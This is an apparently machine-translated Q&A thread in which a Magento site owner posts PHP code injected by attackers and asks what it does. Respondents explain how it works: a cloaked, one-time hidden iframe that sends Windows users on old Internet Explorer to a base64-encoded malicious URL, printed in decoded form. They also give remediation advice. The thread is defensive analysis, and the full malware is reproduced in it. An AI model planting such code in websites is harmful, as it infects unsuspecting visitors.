PHP Web应用程序(Magento)被黑客攻击;这个黑客代码做什么?
我的Magento 1.3.2.4安装刚刚被黑客入侵。你能告诉我这个代码的目的是什么吗 另外,如何阻止这种情况以及如何发现漏洞 多谢各位PHP Web应用程序(Magento)被黑客攻击;这个黑客代码做什么?,php,security,magento,xss,Php,Security,Magento,Xss,我的Magento 1.3.2.4安装刚刚被黑客入侵。你能告诉我这个代码的目的是什么吗 另外,如何阻止这种情况以及如何发现漏洞 多谢各位 function net_match ( $network , $ip ) { $ip_arr = explode ( '/' , $network ); $network_long = ip2long ( $ip_arr [ 0 ]); $x = ip2long ( $ip_arr [ 1 ]); $mask = long2ip ( $x ) == $ip_
function net_match ( $network , $ip ) {
$ip_arr = explode ( '/' , $network );
$network_long = ip2long ( $ip_arr [ 0 ]);
$x = ip2long ( $ip_arr [ 1 ]);
$mask = long2ip ( $x ) == $ip_arr [ 1 ] ? $x : 0xffffffff << ( 32 - $ip_arr [ 1 ]);
$ip_long = ip2long ( $ip );
return ( $ip_long & $mask ) == ( $network_long & $mask );
}
$ip=$_SERVER['REMOTE_ADDR'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$user_agent = $_SERVER["HTTP_USER_AGENT"];
$IP = $_SERVER['REMOTE_ADDR'].".log";
@mkdir('/tmp/Location/');
$dfjgkbl=base64_decode('aHR0cDovLzEyOS4xMjEuMzguMTAyL0hvbWUvaW5kZXgucGhw');
if(!file_exists("/tmp/Location/{$IP}"))
{
if(
net_match('64.233.160.0/19',$ip)==0 &&
net_match('66.102.0.0/20',$ip)==0 &&
net_match('66.249.64.0/19',$ip)==0 &&
net_match('72.14.192.0/18',$ip)==0 &&
net_match('74.125.0.0/16',$ip)==0 &&
net_match('89.207.224.0/24',$ip)==0 &&
net_match('193.142.125.0/24',$ip)==0 &&
net_match('194.110.194.0/24',$ip)==0 &&
net_match('209.85.128.0/17',$ip)==0 &&
net_match('216.239.32.0/19',$ip)==0 &&
net_match('128.111.0.0/16',$ip)==0 &&
net_match('67.217.0.0/16',$ip)==0 &&
net_match('188.93.0.0/16',$ip)==0
)
{
if(strpos($user_agent, "Windows") !== false)
{
if (preg_match("/MSIE 6.0/", $user_agent) OR
preg_match("/MSIE 7.0/", $user_agent) OR
preg_match("/MSIE 8.0/", $user_agent)
)
{
echo '<iframe frameborder=0 src="'.$dfjgkbl.'" width=1 height=1 scrolling=no></iframe>';
touch ("/tmp/Location/{$IP}");
}}}}
功能网络匹配($network,$ip){
$ip_arr=explode(“/”,$network);
$network_long=ip2long($ip_arr[0]);
$x=IP2长($ip_arr[1]);
$mask=long2ip($x)==$ip\u arr[1]?$x:0xFFFFFF它创建一个iframe,将人们引导到另一个站点。dfjgkbl变量包含URL的base64编码;如果您想知道它是什么,可以使用在线base64解码器。根据您的其余代码,我不会将其粘贴到这里,因为URL可能包含Windows病毒
$dfjgkbl=base64_decode('aHR0cDovLzEyOS4xMjEuMzguMTAyL0hvbWUvaW5kZXgucGhw');
转到:
不要点击(这是黑客链接)>>>>129.121.38.102/Home/index.php
黑客会创建一个日志记录你网站上的所有内容。这只是一个友好的建议,如果你使用FileZilla作为FTP代理,它会将保存的密码保存在xml文件中,你的电脑上可能有病毒,可以将FileZilla连接到你的服务器并将其写入你的文件。另外,请检查你的CPanel,并查找那些不是由您创建的。可能不是这样,请随时检查。我与Total Commander也有类似问题…病毒使用了TC FTP帐户,完全更改了我的网站(Joomla CMS),并在几乎每个php文件中添加了类似的恶意代码。首先升级您的Magento,此时它就像非常旧的版本一样
你的黑客代码是一个通用的php病毒代码,我们每次都会看到,它是一个自动病毒,从你的电脑到服务器或从服务器
你也可以使用一个免费的插件,比如:magefirewall来保护你的magento
p.S我是开发人员之一另外,它排除了一些域范围和非MSIE浏览器,因为它们不太可能感染病毒,更可能被检测到……非常感谢。现在有没有办法跟踪问题……并防止问题发生?如果我在另一个php文件中添加代码,检测该文件是否已更改并还原更改s、 这是否安全?检测是好的,但这有点像在你的屏蔽门上有一个洞。当然,你可以检测到蚊子进入,但在你修复你的洞之前,会有更多的蚊子进来。@Rock你必须确定这些代码是如何进入你的网站的。更改所有密码,将问题通知管理员,最终更改密码管理员。如果您现在没有使用版本控制系统,还可以使用一些版本控制系统来检测代码的所有更改。您的安全性似乎有问题。您在哪里找到此代码?+1。检查iFrame错误时,我首先要做的是,客户端是否使用FileZilla—IMO有史以来最差的FTP代理。它是terrible.Free或not Free.可怕。是时候让人们开始获得线索了。请使用SCP/SFTP,这样您就不会以明文形式传递登录凭据,然后将名称/密码保存在安全的地方(加密存储)。